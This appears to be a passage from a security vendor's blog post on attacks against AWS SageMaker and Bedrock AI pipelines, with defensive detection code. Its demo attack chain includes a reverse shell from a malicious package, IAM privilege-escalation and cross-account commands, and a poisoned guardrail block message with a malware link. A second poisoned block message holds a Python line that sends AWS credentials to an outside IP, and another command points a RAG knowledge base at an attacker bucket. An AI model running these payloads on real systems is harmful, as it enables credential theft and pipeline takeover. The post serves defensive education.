AI in the Crosshairs: Understanding and Detecting Attacks on AWS AI Services with Trend Vision One™

By Yash Verma and Sunil Bharti

Key Takeaways

- This article highlights the rapid growth of AI-as-a-service (AIaaS) and an increasing dependency on cloud-based AI solutions.

- We also discuss recent attack incidents targeting AI infrastructures and cloud services and common attack vectors.

- We highlight a machine learning (ML) supply chain attack that exposes how misconfigurations and security oversights in Amazon SageMaker and Bedrock deployments can compromise the ML pipeline.

- Trend Vision One™ offers critical visibility to detect these attacks and provides actionable insights on mitigating these risks in AI pipelines.

The emergence of AI-as-a-service (AIaaS)

Artificial intelligence as a service (AIaaS) makes AI tools and capabilities available through the cloud. Businesses can explore and use AI capabilities such as machine learning, natural language processing, and computer vision without building the technology in-house. AIaaS gained significant traction in 2023, primarily driven by the launch of OpenAI's ChatGPT in November 2022. With AIaaS providers such as AWS, Microsoft Azure, and Google Cloud, developers can quickly build, deploy, and scale AI applications to meet business needs.

The growing adoption of AI also introduces emerging security risks. AI solutions often require large amounts of data for training and customization, but many inference use cases do not involve direct data access by the AIaaS vendor. However, misconfigurations or insecure deployments can expose companies to third-party risks, data leakage, or model manipulation. Securing data access, transit, and storage remains essential, as attackers may exploit vulnerabilities within these AI services to inject malicious data, manipulate AI outputs, or launch model extraction attacks. In this article, we go through a few attack cases and key incidents that demonstrate how securing AI has become a new business requirement.

AI in the crosshairs: A look at past incidents and reports

The increasing reliance on artificial intelligence has made it a prime target for cyberattacks, raising concerns over security vulnerabilities and incidents. This section delves into significant historical incidents and reports, illustrating the evolving threat landscape and highlighting the critical need for robust security measures in AI applications.

- Rising cyberattacks:

  - A forecast indicates that 93% of security leaders expect to encounter daily AI attacks by 2025.

  - Gartner projected that AI cyberattacks will use methods such as training-data poisoning, AI model theft, or adversarial samples.

- Organizational concerns:

  - According to a Microsoft survey, 25 out of 28 organizations struggle to find adequate tools for securing their machine learning systems.

- Exposures and misconfiguration:

  - Trend Micro and Cybersecurity Insiders' 2024 Cloud Security Report identifies configuration and misconfiguration management as a significant concern for 56% of the report's survey respondents.

  - In addition, 61% of respondents highlight data security breaches as a top concern, encompassing issues such as data exfiltration and exposure due to misconfiguration.

  - Research from another 2024 report found that 82% of organizations using Amazon SageMaker have at least one notebook exposed to the internet, increasing their risk of cyberattacks.

- Increasing CVEs:

  - Research by JFrog disclosed more than 20 common vulnerabilities and exposures (CVEs) affecting various ML vendors, highlighting the growing number of known security weaknesses in AI systems.



Figure 1. These incidents indicate a significant increase in both the frequency and sophistication of attacks on AI systems, emphasizing the urgent need for enhanced security measures across organizations.

Common attack vectors in AI services and pipelines

Cloud ML pipelines, while powerful, are vulnerable to numerous attack vectors that can jeopardize the integrity, confidentiality, and availability of ML models and their data. These threats include data poisoning, model evasion, supply chain attacks, and more, each posing significant risks to the reliability and security of AI systems. Let’s look at some of the major attack vectors and targets:

Major vectors:

1. Poor coding practices

Inadequate coding practices can introduce vulnerabilities, allowing attackers to exploit ML models or sensitive data. Issues such as hardcoding API keys or passwords, poor error handling, and not adhering to secure coding standards are prevalent. Additionally, the use of third-party libraries or unverified models can expose systems to risks. For instance, research identified around 100 ML models on Hugging Face that might let attackers inject harmful code, emphasizing the need for better security practices.
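Hardcoded credentials are among the easiest of these issues to catch before code ships. The following minimal Python sketch scans source text for strings shaped like AWS access key IDs. It assumes the widely documented format of 20 characters starting with `AKIA` (long-term keys) or `ASIA` (temporary keys). This is an illustration only; dedicated secret scanners also look for secret access keys and high-entropy strings.

```python
import re

# AWS access key IDs: a 4-character prefix (AKIA for long-term keys, ASIA for
# temporary STS keys) followed by 16 uppercase letters or digits. The word
# boundaries avoid matching inside longer tokens.
ACCESS_KEY_ID = re.compile(r"\b(?:AKIA|ASIA)[A-Z0-9]{16}\b")


def find_hardcoded_key_ids(source: str) -> list[tuple[int, str]]:
    """Return (line_number, key_id) pairs for every candidate key ID."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for match in ACCESS_KEY_ID.finditer(line):
            hits.append((lineno, match.group()))
    return hits


if __name__ == "__main__":
    sample = (
        "import boto3\n"
        "client = boto3.client('s3',\n"
        "    aws_access_key_id='AKIAIOSFODNN7EXAMPLE')  # hardcoded: bad\n"
    )
    print(find_hardcoded_key_ids(sample))
```

`AKIAIOSFODNN7EXAMPLE` is the placeholder key ID that AWS uses in its own documentation. Running a check like this as a pre-commit hook stops the problem before it reaches a shared repository.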

2. Over-reliance on AI for code generation

Generative AI can accelerate the development cycle by generating code for developers, but it may also introduce security gaps, particularly if the generated code isn't thoroughly reviewed, sanitized, and tested. For instance, Invicti researchers have documented concerns that suggestions from GitHub's AI-powered code suggestion tool contained "SQL injection and cross-site scripting (XSS)" vulnerabilities. Research from Stanford University also found that AI-assisted code development produced buggier code.
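The SQL injection pattern flagged in such reviews usually comes from building queries with string formatting. The sketch below uses Python's built-in `sqlite3` module and a hypothetical `users` table. It contrasts that pattern with a parameterized query, which is the fix reviewers should look for in generated code.

```python
import sqlite3


def setup() -> sqlite3.Connection:
    # Hypothetical in-memory table used only for this illustration.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "admin"), ("bob", "viewer")],
    )
    return conn


def find_user_unsafe(conn: sqlite3.Connection, name: str) -> list:
    # Vulnerable: user input is spliced directly into the SQL text.
    return conn.execute(
        f"SELECT name, role FROM users WHERE name = '{name}'"
    ).fetchall()


def find_user_safe(conn: sqlite3.Connection, name: str) -> list:
    # Safe: the driver binds the value, so it is never parsed as SQL.
    return conn.execute(
        "SELECT name, role FROM users WHERE name = ?", (name,)
    ).fetchall()


if __name__ == "__main__":
    conn = setup()
    payload = "x' OR '1'='1"
    print(find_user_unsafe(conn, payload))  # every row is returned
    print(find_user_safe(conn, payload))    # no rows match
```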

3. Misconfigurations in cloud platforms

Misconfigurations in cloud environments pose severe security risks, enabling unauthorized access to sensitive data and AI processes. Common mistakes include leaving storage solutions unprotected and failing to set appropriate access controls.

4. Vulnerabilities in AI-specific libraries

AI-specific libraries can harbor vulnerabilities that, when exploited, compromise the integrity of AI models and associated data. For example, CVE-2024-34359, also known as “Llama drama,” is a critical flaw in the llama-cpp-python package. This vulnerability allows remote code execution due to insufficient input validation, posing risks of supply chain attacks if left unaddressed.

5. Vulnerabilities within the cloud platform

Flaws in cloud infrastructure can be leveraged to target AI systems, typically through insecure APIs or architectural weaknesses. For instance, a critical API vulnerability was discovered in Replicate in early 2024, which permitted unauthorized access to model data. This exploitation could allow attackers to view or alter sensitive information. Replicate has since implemented a fix, underscoring the importance of robust security measures in AI platforms.

Major targets:

1. Developers

Developers are prime targets for attackers because they possess direct access to critical code repositories and sensitive system configurations. Their role involves writing and maintaining code, which often requires using third-party libraries and open-source tools. If developers are not vigilant about security best practices, they may introduce vulnerabilities into the software, such as hardcoded credentials or insecure API integrations. Additionally, they may be targeted through social engineering tactics like phishing, where attackers attempt to trick them into revealing sensitive information or granting unauthorized access.

2. Data scientists

Data scientists are also significant targets due to their access to valuable datasets and machine learning models. Their work involves collecting, cleaning, and analyzing data, which can include sensitive information. Attackers may target data scientists to manipulate training data — known as data poisoning — potentially leading to flawed model predictions and decision-making. Furthermore, data scientists often rely on various open-source libraries, which may contain vulnerabilities that can be exploited. Their focus on innovation and experimentation can make them less vigilant about security, increasing their risk of falling victim to attacks.

AI attack frameworks

MITRE ATLAS



MITRE ATLAS categorizes adversarial techniques targeting AI and machine learning systems, offering a taxonomy that includes various attack methods, objectives, and defensive strategies. The framework also features recent attack case studies, providing real-world examples that illustrate how these vulnerabilities have been exploited, thus aiding security professionals in understanding and mitigating risks in AI applications.

Figure 2. Matrices from the MITRE ATLAS.

OWASP Machine Learning Security Top Ten

The OWASP Machine Learning Security Top Ten outlines critical security risks associated with machine learning systems, including vulnerabilities like data poisoning and model inversion. Each entry provides descriptions, examples, and recent case studies to highlight real-world implications. This information serves as a crucial guide for organizations to implement secure practices throughout the development and deployment of AI technologies, ultimately enhancing their security posture.

| Top 10 Critical Security Risks Associated With Machine Learning Systems |
|---|
| ML01:2023 Input Manipulation Attack |
| ML02:2023 Data Poisoning Attack |
| ML03:2023 Model Inversion Attack |
| ML04:2023 Membership Inference Attack |
| ML05:2023 Model Theft |
| ML06:2023 AI Supply Chain Attacks |
| ML07:2023 Transfer Learning Attack |
| ML08:2023 Model Skewing |
| ML09:2023 Output Integrity Attack |
| ML10:2023 Model Poisoning |

Table 1. Top 10 critical security risks associated with machine learning systems from the official OWASP site.

Common AWS AI services

Amazon Bedrock

Amazon Bedrock is Amazon’s fully managed service that simplifies building and scaling generative AI applications. It offers a diverse selection of powerful foundation models (FMs) from leading AI providers, enabling the creation of applications such as chatbots and content generators without requiring advanced AI expertise.

Core components:

- Knowledge base: It acts as an AI “memory.” Using the Retrieval Augmented Generation (RAG) technique, a knowledge base searches your data for the most relevant information and uses it to answer questions naturally.

- Custom and Imported Models: Customized models designed for specific business needs, with the option to fine-tune them.

- Guardrails: Guardrails in Amazon Bedrock provide additional customizable protections for applications using large language models (LLMs).

- Foundation Models: Trusted models from top providers make a powerful base for your applications, with options to personalize for specialized needs.

Amazon SageMaker

Amazon SageMaker is a managed service that simplifies building, training, and deploying machine learning models using various tools like notebooks, debuggers, profilers, pipelines, and MLOps.

Core components:

- SageMaker Studio: An integrated development environment (IDE) for building, training, and deploying machine learning models.

- SageMaker Notebooks: Fully managed Jupyter notebooks for data exploration and model development.

- SageMaker Autopilot: Automates ML model creation while maintaining control and visibility.

- SageMaker Training: Scalable and managed training for ML models.

- SageMaker Endpoints: Fully managed endpoints for deploying models, allowing real-time inference, with support for multi-model endpoints, auto-scaling, and A/B testing.

AWS AI pipelines – Bedrock and SageMaker synergy

Developers can utilize Amazon SageMaker for comprehensive model development and Amazon Bedrock for seamless deployment, creating an efficient workflow for building AI applications. SageMaker offers a robust suite of tools for data preparation, model training, hyperparameter tuning, and evaluation. With its support for various algorithms and frameworks, developers can create high-quality models tailored to their specific needs. Once a model is trained, it can be registered in SageMaker's Model Registry, which facilitates versioning and management, ensuring that teams can track and deploy the most effective models.

Developers can import specific, customized machine learning models created in Amazon SageMaker into Amazon Bedrock, enabling seamless integration and enhancing their AI workflows. Bedrock provides a fully managed environment that simplifies the deployment process, allowing developers to scale applications without the complexities of infrastructure management. It also offers access to foundation models from various providers, enabling further fine-tuning and integration with SageMaker models to enhance generative capabilities. This synergy between SageMaker and Bedrock not only streamlines the workflow from development to deployment but also optimizes resource usage and costs, empowering developers to deliver innovative, scalable AI solutions efficiently.

ML supply chain attack – 1.1

As mentioned earlier, today's ML supply chains and services face threats mainly for two reasons:

- Poor coding practices

- Misconfigurations in the cloud platforms providing AI services

The following demo presents a supply chain attack that illustrates both of these points. It emphasizes the importance of a secure ML pipeline and of effectively monitoring events with logs such as AWS CloudTrail.

Target AWS generative AI ops infrastructure



Figure 3. Target AWS AI pipeline

1. Development phase (DEV AWS account)

- Amazon SageMaker:

  - Notebook instances: Two types of SageMaker notebook instances are utilized:

    - Developer role: Configured for data scientists to conduct pre-training activities and model experimentation.

    - Data scientist role: Tailored for more specialized tasks by data scientists.

    - Misconfigured instance: A developer made a small oversight in the configuration of this notebook instance, assigning it an AWS-provided default execution role and direct internet access.

- VPC (virtual private cloud):

  - The notebook instances are hosted within a VPC with properly configured security groups (SGs) to control access and ensure a secure environment.

- Training data:

  - The data used for pre-training the models is sourced from a secure location, ensuring relevance for the model's initial learning phase.

2. Production phase (Production AWS account)

- Cross-account role:

  - This role is provided so that lead developers and administrators can update guardrails. With every version of the fine-tuned model, the guardrails may be recalibrated to maintain compliance and performance.

- Amazon Bedrock:

  - Custom model: A Python code generation model developed in the Dev account that uses Bedrock's generative AI capabilities to query DynamoDB. Each version is pushed to production through an internal GitHub repository, which developers in the Dev account access from SageMaker notebooks.

  - Conversational model agent: A model designed for handling conversational interactions, enhancing user experiences using the Amazon Bedrock Agents feature.

- Amazon Bedrock Guardrails:

  - Guardrails help ensure safe and controlled use of AI systems by enforcing rules that prevent harmful or unintended outcomes during interactions. Whenever a new guardrail version is released, Lambda automatically uses the latest version when invoking models.

- Amazon DynamoDB and S3:

  - Customer profiling data: Stored in DynamoDB, this data enhances the model's capabilities by providing contextual information about users.

  - Knowledge base: Stored in S3, this serves as a repository of information that the models can reference to improve responses and interactions.

- Amazon Bedrock Knowledge Base (RAG):

  - This technique combines information retrieval from the knowledge base with generative capabilities, allowing the model to provide more accurate and contextually relevant answers.

3. Interaction and API layer

- AWS Lambda:

  - Acts as a serverless compute service that processes requests and manages interactions between the components of the pipeline. It can trigger actions based on events, such as user queries, and it contains the business logic of the Bedrock architecture.

- Amazon API Gateway:

  - Serves as the interface for external applications (such as a web application) to interact with the deployed models. It manages requests and responses, ensuring secure and efficient communication.

4. Web application

- User interaction:

  - The web application serves as the front-end interface where users interact with the models. It allows users to submit queries and receive responses, facilitating a smooth user experience.

The attack scenario outlined below has been thoroughly reviewed by the AWS team. We mutually agreed that there are no inherent weaknesses or vulnerabilities in Amazon Bedrock or SageMaker. AWS provides comprehensive security features that, when properly configured, can mitigate such risks—these are detailed later in the blog. This scenario is a custom-crafted example designed to illustrate common misconfigurations and mistakes developers make in AI environments, along with their security implications.

The attack



Figure 4. The attack path



Step 1 - SageMaker notebook instance takeover using malicious extension download (AML.T0010.001 - ML supply chain compromise: ML software)

Amazon SageMaker can become a common entry point for attackers into AWS-based AI pipelines. A 2024 cloud security report revealed that 82% of organizations using SageMaker have at least one notebook exposed to the internet. To exploit this vector, the attacker publishes a malicious extension, and a developer downloads it as a third-party extension. As shown in the diagram, one of the notebooks hosted in the Dev AWS account is misconfigured to allow direct internet access. The developer also regularly installs public third-party extensions on it, which makes it easier for the attacker to deliver the malicious payload onto the notebook. The Jupyter notebook itself clearly warns about this risk:

Figure 5. Screenshot from Jupyter notebook



As highlighted in Figure 5, attackers can create public repositories to host their malicious packages. This tactic has been reported before, as seen in Unit 42's report on malicious packages in PyPI. To showcase the impact, we created a malicious Python package. Once it is installed and a specific function is called in an Amazon SageMaker notebook, the package opens a backdoor and provides the attacker with a reverse shell.

Figure 6. Malicious package installation



Once the user installs the malicious plugin and the malicious function is called, the attacker gets a reverse shell.

Figure 7. Reverse shell connection establishment

Because the notebook has direct internet access and is not restricted by any security group, the reverse shell can connect back to the attacker on any port. This allows the attacker to run arbitrary commands on the notebook instance remotely, potentially compromising any data or configurations accessible to the instance.
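The misconfigurations that made this step possible are visible in the notebook's own configuration. The function below is a minimal sketch that audits a dictionary shaped like the response of boto3's SageMaker `describe_notebook_instance` call. That response includes `DirectInternetAccess`, `RootAccess`, and `RoleArn`, plus `SubnetId` and `SecurityGroups` for VPC-attached notebooks. The sketch assumes that role names beginning with `AmazonSageMaker-ExecutionRole-` are console-generated defaults. This matches the naming the SageMaker console typically uses, but you should adjust it for your environment.

```python
# Assumption: console-created default execution roles use this name prefix.
DEFAULT_ROLE_PREFIX = "AmazonSageMaker-ExecutionRole-"


def audit_notebook(desc: dict) -> list[str]:
    """Return findings for one describe_notebook_instance-style response."""
    findings = []
    if desc.get("DirectInternetAccess") == "Enabled":
        findings.append("direct internet access enabled")
    if desc.get("RootAccess") == "Enabled":
        findings.append("root access enabled")
    if not desc.get("SubnetId") or not desc.get("SecurityGroups"):
        findings.append("not attached to a VPC subnet with security groups")
    # Role ARNs may include a path (e.g. role/service-role/...); keep the name.
    role_name = desc.get("RoleArn", "").rsplit("/", 1)[-1]
    if role_name.startswith(DEFAULT_ROLE_PREFIX):
        findings.append(f"uses default execution role {role_name}")
    return findings


if __name__ == "__main__":
    sample = {  # hypothetical notebook resembling the misconfigured instance
        "NotebookInstanceName": "dev-notebook",
        "DirectInternetAccess": "Enabled",
        "RootAccess": "Enabled",
        "RoleArn": "arn:aws:iam::111122223333:role/service-role/"
                   "AmazonSageMaker-ExecutionRole-20240101T000000",
    }
    for finding in audit_notebook(sample):
        print(finding)
```

In practice, you could call `boto3.client("sagemaker").describe_notebook_instance(NotebookInstanceName=name)` for each name returned by `list_notebook_instances()` and pass each response to this function.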



Step 2 – Enumeration on SageMaker notebook instance (AML.T0007 - Discover ML artifacts)

Once the reverse shell has been established, the attacker can execute system commands, enumerate AWS services, and create resources in the AWS environment.

Figure 8. Amazon SageMaker Notebook enumeration

Figure 9. Detailed information about the notebook

Figure 10. AWS IAM role enumeration

By checking the environment, the attacker can see that they have taken over a SageMaker notebook and can start enumerating permissions.

The attacker enumerates SageMaker resources and IAM permissions:

aws sagemaker list-notebook-instances

aws sagemaker list-code-repositories

aws sagemaker list-training-jobs

aws sagemaker list-endpoints

aws sagemaker describe-code-repository --code-repository-name

aws iam list-roles

aws iam list-users

aws iam list-groups

aws iam list-attached-role-policies --role-name

aws iam get-role --role-name

After the enumeration process, the attacker also gains access to the training data, the model, and the internal GitHub link used to push model updates to production. This potentially allows the attacker to poison the pre-training data or the model and push it to production. We will discuss this model and training data poisoning attack vector in the next blog in this series.
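Enumeration detections look for bursts of `List*`, `Get*`, and `Describe*` calls like the one above. The following sketch does not describe how Trend Vision One implements its workbenches. It is a simple threshold heuristic over parsed CloudTrail records that use the standard `eventTime`, `eventName`, `eventSource`, `errorCode`, and `userIdentity.arn` fields. The default of 10 distinct successful read-only calls within five minutes is an arbitrary assumption that you would tune per environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Read-only API name prefixes typical of reconnaissance.
READ_ONLY_PREFIXES = ("List", "Get", "Describe")


def parse_time(ts: str) -> datetime:
    # CloudTrail eventTime values look like "2024-05-01T12:00:00Z".
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")


def enumeration_suspects(records, threshold=10, window=timedelta(minutes=5)):
    """Return ARNs of principals that made at least `threshold` distinct
    successful read-only API calls within any `window`-long interval."""
    calls = defaultdict(list)  # principal ARN -> [(time, "source:eventName")]
    for rec in records:
        name = rec.get("eventName", "")
        if rec.get("errorCode") or not name.startswith(READ_ONLY_PREFIXES):
            continue  # skip failed calls and anything that is not read-only
        arn = rec.get("userIdentity", {}).get("arn", "unknown")
        calls[arn].append((parse_time(rec["eventTime"]),
                           f"{rec.get('eventSource')}:{name}"))
    suspects = set()
    for arn, events in calls.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Advance the left edge until the interval spans at most `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            distinct = {api for _, api in events[start:end + 1]}
            if len(distinct) >= threshold:
                suspects.add(arn)
                break
    return suspects
```

Counting distinct APIs rather than raw calls keeps a busy but repetitive workload, such as a job polling one endpoint, from looking like reconnaissance.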

Step 3 - Privilege escalation using SageMaker notebook execution role (AML.T0049 - Exploit public-facing application)

After enumerating permissions, the attacker discovers that the compromised notebook instance has three critical permissions: sagemaker:CreateNotebookInstance, sagemaker:CreatePresignedNotebookInstanceUrl, and iam:PassRole. The attacker exploits this by using sagemaker:CreateNotebookInstance to create a new notebook instance, passing a role with administrative privileges in the --role-arn parameter. They then use sagemaker:CreatePresignedNotebookInstanceUrl to generate a presigned URL for the new notebook. This escalates them to administrator privileges and potentially lets them take over the whole Dev account.

aws sagemaker create-notebook-instance --notebook-instance-name example --instance-type ml.t2.medium --role-arn arn:aws:iam::

The response includes NotebookInstanceArn, which contains the ARN of the created instance. Once ready, the attacker uses the following to generate a URL for accessing the notebook:

aws sagemaker create-presigned-notebook-instance-url --notebook-instance-name
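This step leaves a recognizable pair of events in CloudTrail. The first is a `CreateNotebookInstance` call that passes an unexpected role. The second is a `CreatePresignedNotebookInstanceUrl` call for the same notebook by the same principal. The sketch below pairs the two events. The `requestParameters.notebookInstanceName` and `requestParameters.roleArn` fields match those listed for the SageMaker workbenches later in this article. Treating any role outside an allowlist of approved notebook roles as suspicious is our own assumption.

```python
def notebook_privesc_chains(records, approved_roles: set[str]):
    """Yield (principal, notebook, role) when a principal creates a notebook
    with a role outside `approved_roles` and later requests a presigned URL
    for that same notebook."""
    created = {}  # (principal, notebook) -> role passed at creation
    # ISO-8601 eventTime strings in one format sort chronologically.
    for rec in sorted(records, key=lambda r: r["eventTime"]):
        if rec.get("errorCode"):
            continue  # ignore failed API calls
        params = rec.get("requestParameters") or {}
        principal = rec.get("userIdentity", {}).get("arn")
        notebook = params.get("notebookInstanceName")
        if rec.get("eventName") == "CreateNotebookInstance":
            role = params.get("roleArn")
            if role not in approved_roles:
                created[(principal, notebook)] = role
        elif rec.get("eventName") == "CreatePresignedNotebookInstanceUrl":
            role = created.get((principal, notebook))
            if role is not None:
                yield principal, notebook, role
```

As a preventive control, you can scope `iam:PassRole` to specific role ARNs and use the `iam:PassedToService` condition key to limit which roles a notebook creator can hand to SageMaker.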

Step 4 - Cross-account role abuse

At this point, the attacker knows that this is a Dev AWS account that could be part of a production pipeline connected to a production AWS account. The attacker therefore hunts for cross-account role assumptions in past CloudTrail logs. There, they find the ARN of a cross-account role that the production AWS account provided for lead developers and administrators to assume.

aws sts assume-role --role-arn arn:aws:iam::123456789012:role/bedrock-productionCheck --role-session-name temp-assume

The attacker uses the cross-account role ARN to obtain temporary STS credentials for the production Bedrock role, which has guardrail permissions.
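The production role is meant to be assumed only by lead developers and administrators, so an `AssumeRole` call to it from any other identity is a strong signal. The following minimal sketch assumes you maintain an allowlist of expected caller ARNs for each sensitive role. CloudTrail records the target role of `AssumeRole` in `requestParameters.roleArn`. The sketch also assumes it runs on the calling (Dev) account's trail, where the caller's full ARN appears in `userIdentity.arn`.

```python
def unexpected_assume_role(records, expected_callers: dict[str, set[str]]):
    """Return (caller, role) pairs for successful AssumeRole calls to a
    watched role from a caller not listed in expected_callers[role]."""
    alerts = []
    for rec in records:
        if rec.get("eventName") != "AssumeRole" or rec.get("errorCode"):
            continue
        role = (rec.get("requestParameters") or {}).get("roleArn")
        if role not in expected_callers:
            continue  # not a role we are watching
        caller = rec.get("userIdentity", {}).get("arn", "unknown")
        if caller not in expected_callers[role]:
            alerts.append((caller, role))
    return alerts
```

Exact ARN matching is deliberately simple. Callers that arrive through federated or SSO sessions have session-specific ARNs, so a real allowlist would likely match on role or user prefixes instead.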

Step 5 – Guardrail block message poisoning – Link injection (AML.T0011.000 - User Execution: Unsafe ML Artifacts)

The attacker again enumerates the role's permissions and finds guardrail permissions such as ListGuardrails, UpdateGuardrail, and CreateGuardrailVersion. Using these, the attacker lists the guardrails and poisons the block message of a guardrail configuration attached to the Bedrock conversational agent. The attacker then creates a new guardrail version to deploy.

Because AWS allows all special characters in custom block messages, the attacker can poison the guardrail configuration as follows. If the application user's chat contains “What” or “How,” the guardrail blocks the input and returns this output: “For information on this please refer our detailed guide – http://malicious-link/malware.pdf”.

aws bedrock update-guardrail --guardrail-identifier "ltxzqvhcbrj0" --name "Bedrock-Code-Generation-Model-Protection" --blocked-input-messaging "For information on this one, refer our detailed guide - http://malicious-link/malware.pdf" --blocked-outputs-messaging "." --word-policy-config "wordsConfig=[{text=How},{text=What}]"

The following video shows a short demo of a generative AI application that uses a draft version of the guardrail. It demonstrates how an attacker can poison the guardrail configuration and how the model output is affected:

Figure 11. A video demonstrating the attack's impact on the chat app

This can also be exploited by poisoning a CloudFormation Guardrail stack (AWS::Bedrock::Guardrail).

An attacker could also exploit an XSS vulnerability, similar to link injection. If the chat app used by users contains XSS flaws, it could serve as another potential attack vector.
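A poisoned block message is ordinary configuration, so defenders can audit it directly. The following Python sketch checks a dictionary shaped like the response of the boto3 Bedrock client's `get_guardrail` call, which includes the `blockedInputMessaging` and `blockedOutputsMessaging` fields. It flags messages that contain URLs or code-like tokens. The patterns are illustrative assumptions, not a complete ruleset. Comparing messages against an allowlist of approved strings is a stricter option.

```python
import re

# Illustrative patterns: anything URL-like, or tokens typical of Python code.
SUSPICIOUS = [
    re.compile(r"https?://", re.IGNORECASE),
    re.compile(r"\bimport\s+\w+"),
    re.compile(r"\b(?:exec|eval|__import__|socket|subprocess)\b"),
]


def audit_guardrail_messages(guardrail: dict) -> list[str]:
    """Return the names of messaging fields that match a suspicious pattern."""
    flagged = []
    for field in ("blockedInputMessaging", "blockedOutputsMessaging"):
        message = guardrail.get(field, "")
        if any(p.search(message) for p in SUSPICIOUS):
            flagged.append(field)
    return flagged
```

The same check would also catch the code-injection variant described in scenario 1.2. A block message should normally be short, static text such as an apology.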

Step 6 – Chat application user gets infected (AML.T0048.003 - External harms: User harm)

Because the user implicitly trusts the chat application's output, they click the link for more information, and malware is deployed on their machine.

Figure 12. Malicious link in chat app response

ML supply chain attack – 1.2

As mentioned in the previous section, AWS allows all special characters in block messages. The impact of this small design flaw could be huge when attackers inject code into a Bedrock Guardrail block message. This applies to infrastructures where code generation models are directly leveraged for different actions. Developers sometimes implicitly trust model outputs (which they shouldn't), so they might skip sanitizing those outputs in the downstream infrastructure that consumes them. The use cases that might be affected by this code execution technique include:

- Infrastructure automation: AI models generate CloudFormation or Terraform scripts to automate cloud resource setup and scaling.

- Data pipeline automation: AI creates SQL queries or AWS Glue jobs for automating data extraction, transformation, and loading.

- AI-driven code suggestions: AI assists in generating optimized code or ML pipelines for SageMaker, automating data science workflows.

- Chatbot actions integration: AI generates code to connect chatbots with backend AWS services (e.g., updating order statuses, running inventory checks).

Step 5 – Guardrail block message poisoning – Code injection (AML.T0011.000 - User execution: Unsafe ML artifacts)

Let’s continue the previous attack chain, this time assuming the attacker has only ListGuardrails and UpdateGuardrail permissions. The attacker now targets another guardrail configuration, one configured for the code generation model, and poisons it as follows:

aws bedrock update-guardrail --guardrail-identifier "ltxzqvhcbrj0" --name "Bedrock-Code-Generation-Model-Protection" --blocked-input-messaging "import boto3; import socket; socket.create_connection(('34.229.117.219', 8080)).sendall(str(boto3.Session().get_credentials().get_frozen_credentials().__asdict__()).encode('utf-8'))" --blocked-outputs-messaging "." --word-policy-config "wordsConfig=[{text=How},{text=What}]"

A close look at the block message shows that the attacker is trying to obtain the credentials of the AWS Lambda function's execution role. This function handles all the business logic of the production Bedrock infrastructure. Every time a customer (or the attacker) sends a prompt containing “how” or “what,” the block message is passed downstream to the Lambda function, which was originally designed to handle the model's code output. The function executes the payload above and sends the Lambda role's credentials to the attacker. This gives the attacker all the permissions of the Lambda role and control over the entire Bedrock infrastructure. Here is a short video showing a generative AI application using a draft version of the guardrail:
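The root cause here is downstream code that executes model output without validation. The safest design is not to `exec` generated code at all. If a pipeline must run it, it should at least refuse text that is not the kind of code it expects. The sketch below is a hypothetical pre-check for the Lambda function described above. It uses Python's `ast` module to reject generated code that imports modules, calls a small denylist of dangerous built-ins, or touches dunder attributes. It is not a sandbox. Denylists are easy to bypass, so this check should complement isolation and least-privilege roles, not replace them.

```python
import ast
from typing import Optional

# Built-ins that let generated code escape a narrow, data-only purpose.
DENIED_CALLS = {"exec", "eval", "compile", "__import__", "open"}


def reject_reason(generated: str) -> Optional[str]:
    """Return why generated code must not run, or None if it passes the screen."""
    try:
        tree = ast.parse(generated)
    except SyntaxError:
        return "not valid Python"
    for node in ast.walk(tree):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            return "imports are not allowed"
        if (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
                and node.func.id in DENIED_CALLS):
            return f"call to {node.func.id} is not allowed"
        if isinstance(node, ast.Attribute) and node.attr.startswith("__"):
            return "dunder attribute access is not allowed"
    return None
```

The Bedrock response itself also offers an earlier signal. When a guardrail blocks a request made through the Bedrock Converse API, the response's `stopReason` is `guardrail_intervened`. The Lambda function can branch on that value and return the block message as plain text instead of passing it to code-handling logic.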

Figure 13. A generative AI app using a draft version of Guardrail

This can also be exploited by poisoning a CloudFormation Guardrail stack (AWS::Bedrock::Guardrail).

Figure 14. The attack path

With the Lambda role's permissions, an attacker can do much more. Here are some examples:

Step 6 – Amazon Bedrock permission/Service enumeration (AML.T0007 - Discover ML artifacts)

Attackers need to know which permissions and resources they can access on Amazon Bedrock. To find out, they enumerate the Bedrock service, systematically gathering information about Bedrock agents, knowledge bases, memory configurations, data sources, and accessible resources. This enumeration can expose sensitive data and potential attack vectors. The attacker runs the following commands:

aws bedrock-agent list-agents

aws bedrock-agent get-agent --agent-id

aws bedrock-agent list-knowledge-bases

aws bedrock-agent get-knowledge-base --knowledge-base-id

aws bedrock-agent list-data-sources --knowledge-base-id

aws bedrock-agent get-data-source --knowledge-base-id --data-source-id

Step 7 – Bedrock knowledge base RAG poisoning (AML.T0010.002 - ML supply chain compromise: Data)

The attacker also discovers that the compromised Lambda role can update knowledge base data sources. The role has this access so that Bedrock's knowledge base stays up to date for accurate and relevant responses, and the Lambda function calls the UpdateDataSource API to update the knowledge base's data source. The attacker can abuse this API to poison the RAG pipeline built on the knowledge base by pointing its data source to an attacker-controlled S3 bucket.

By hosting tampered data in the attacker-controlled S3 bucket, the attacker can cause the knowledge base to alter model responses. This can lead to significant harm, including misinformation, disrupted operations, and compromised decision-making processes.

AWS CLI command:

aws bedrock-agent update-data-source --name --knowledge-base-id --data-source-id --data-source-configuration "s3Configuration={bucketArn=arn:aws:s3:::attacker-controlled-s3,bucketOwnerAccountId= },type=S3"
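The data source update leaves its own trace. The following minimal sketch shows a check similar in spirit to a cross-account data source alert. It compares `requestParameters.dataSourceConfiguration.s3Configuration.bucketOwnerAccountId` with the account that received the event (`recipientAccountId`) and also checks the bucket ARN against an allowlist. The owner ID field is one of those listed for the corresponding workbench in the table at the end of this article. The allowlist and the decision to treat a missing owner ID as same-account are assumptions of this sketch.

```python
def risky_data_source_update(rec: dict, approved_buckets: set[str]) -> list[str]:
    """Return reasons an UpdateDataSource event looks like RAG poisoning."""
    if rec.get("eventName") != "UpdateDataSource" or rec.get("errorCode"):
        return []
    # Walk down to the S3 configuration, tolerating missing levels.
    s3 = (((rec.get("requestParameters") or {})
           .get("dataSourceConfiguration") or {})
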